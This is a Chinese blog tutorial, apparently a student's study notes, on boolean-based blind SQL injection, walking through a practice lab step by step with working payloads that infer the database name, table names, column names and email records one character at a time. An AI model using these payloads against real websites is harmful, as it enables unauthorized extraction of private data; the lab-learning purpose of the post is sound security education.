SQL 注入之布尔盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量193 收藏
点赞数 1
分类专栏: 安全之SQL注入 文章标签: sql 安全 字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44886111/article/details/110311817
版权
本文详细介绍了SQL注入中的布尔盲注技术,包括其原理、常用的数据库函数以及如何通过逐步测试获取数据库信息。作者通过一个在线靶场实践,演示了判断数据库名、表名和属性名的过程,展示了如何利用布尔盲注获取用户信息。
摘要由CSDN通过智能技术生成

SQL注入之布尔盲注

本人记录这些为了学习的同时,能够有很好的记录,所谓好记性不如烂笔头,同时发布出来,也是希望大家有朋友学习到这里想上网搜索一些东西,以便借用和探讨一些问题,总之,不断学习!!
自我修养:没有一个系统是安全的

理解

*布尔盲注就是:只有两种状态:ture or false,当在地址栏输入查询语句时,对应的结果只有这两种状态,也就是他没有回显位置,那么要如何去知晓它的更深的信息呢?*

盲注需要用到的函数

*length() 返回字符串长度 
 substr() 截取字符串
 ascii()    返回字符串的ascii码
 sleep()  将程序执行延迟 .  ()/秒
 if(exp1,exp2,exp3)   如果第一个正确,就执行第二个,否则执行第三个*

实例讲解

这里我用的是网上下载的sql注入练习靶场。
在这里插入图片描述
**这里很清楚的能看到,他提升我们输入ID,那我们就一步一步的拿到这个靶场的后台数据库信息 **

  1. 输入?id=1,发现出现以下界面:在这里插入图片描述
    那么我们就知道这个界面没有返回回显点,当我们输入错误时,他什么也不显示,那我们就知道这个是个盲注模型了

  2. 首先判断数据库名的字符串长度,这里我是一个一个盲测试弄出来的,如果有小伙伴有更好的,可以评论,我也好好学习。 **?id=1’ and (length(database())=8) --+ ** 得出这个数据库名字字符串长度为8
    以下执行成功都是如图所示 you are in…,我就不截图了

在这里插入图片描述

  1. 来就是用burp来爆破这8个字符分别是什么,burp的使用大家可以网上搜,像软件的使用教程网上还是多。那么再使用前,我们要用到函数substr()和ascii()两个函数,以及ascii表.。_
    这里我做第一个字符,后面以此类推,
    **?id=1’ and (ascii(substr(database(),1,1))=115) --+ **
    这个1,1是指从第一个字符截取一个字符,这里查ascii表得知115为s,就可以慢慢得知名字s…

    • 字security之后,我们就需要拿他的表名*
      ?id=1’ and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101) --+
      这里的limit 0,1是指选取第一个表名,后面以此类推

  3. 拿到表名自然就可以拿表里的属性名了
    ?id=1’ and (ascii(substr((select column_name from information_schema.columns where table_name=‘emails’ limit 0,1),1,1))=105) --+

  4. 有了属性名自然就可以拿到里面的用户信息了
    ?id=1’ and (ascii(substr((select id from emails limit 0,1),1,1))=49) --+
    ?id=1’ and (ascii(substr((select email_id from emails limit 0,1),1,1))=68) --+

今天的学习就到这里,持续学习中

Flipped.....
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2361
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入布尔盲注
m0_56578216的博客
08-23 828
当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果,这种情况就叫盲注布尔盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。布尔盲注是在SQL注入时没有回显和报错,无法使用联合查询和报错注入时的手段,,所以被叫作布尔盲注
SQL注入(盲注)
a12332251的博客
12-07 932
SQL
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL 盲注
白菜执笔人的博客
02-29 592
Web安全攻防 学习笔记 一、SQL 盲注 1.1、盲注介绍         Blind SQL盲注)是注入攻击的其中一种,向数据库发生 true 或 false 这样的问题,并根据应用程序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有 解决 SQL 注入存在的代码问题。 1.2、盲注种类 布尔类型的盲注 时间...
Sql盲注
qq_40077103的博客
09-17 1691
盲注就是sql语句注入后并且成功执行,但是执行的结果不能返回前端,所以需要通过一些其他信息间接推断数据。 盲注分为三类 一、基于布尔盲注 基于布尔盲注使用逻辑判断推测获取的数据,通过给定条件,服务器返回真或假使用二分法或者正则表达式等方法缩小判断的范围。 通常会使用sql中的截取字符串函数,以下是一些常见的函数 mid(column_name,start[,length])  #co...
sql注入布尔盲注
qq_46185846的博客
02-14 212
一:布尔盲注 盲注,就是在服务器没有错误回显是完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的信息,所以攻击者必须找到一个方法来验证注入sql语句是否得到了执行。 注入原理 布尔忙住一般适用于 页面没有回显字段(不支持联合查询),而且web页面返回true或者false,构造sql语句 利用and or 等关键词来时web页面返回true或者false,从而达到注入的目的来获...
sql注入布尔盲注
笔墨稠思
11-13 170
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
sql注入布尔盲注、延时盲注以及原理
maluxiao123的博客
03-30 1246
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注入,而没有回显的话,有sql报错页面可以使用报错注入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注入。 比如
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL盲注
weixin_59872639的博客
02-18 2465
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
sql盲注
weixin_55710577的博客
04-09 7482
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 sql注入--盲注前言一、什么是盲注二、步骤示例1.测试注入点2.测所在数据库长度3. 利用ASCII码猜当前数据库名4.利用ASCII码查询表名5、利用ASCII码查询字段名sql手注所用到的函数总结sqlmap进行sql盲注 前言 靶场环境:sqli-labs-master 第8关 注入攻击的本质:把用户的输入当作代码执行。 其中存在两个关键条件: (1)用户可以控制输入。 (2)用户的输入被拼接到原代码上被执行。 提示:以下是本篇.
SQL注入盲注
胖虎的博客
11-15 1811
sql注入布尔类型的盲注,结合burpsuite工具实现半自动化
SQL注入---盲注
zhoutong2323的博客
04-05 705
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
sql注入盲注
2302_79119987的博客
04-23 1927
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值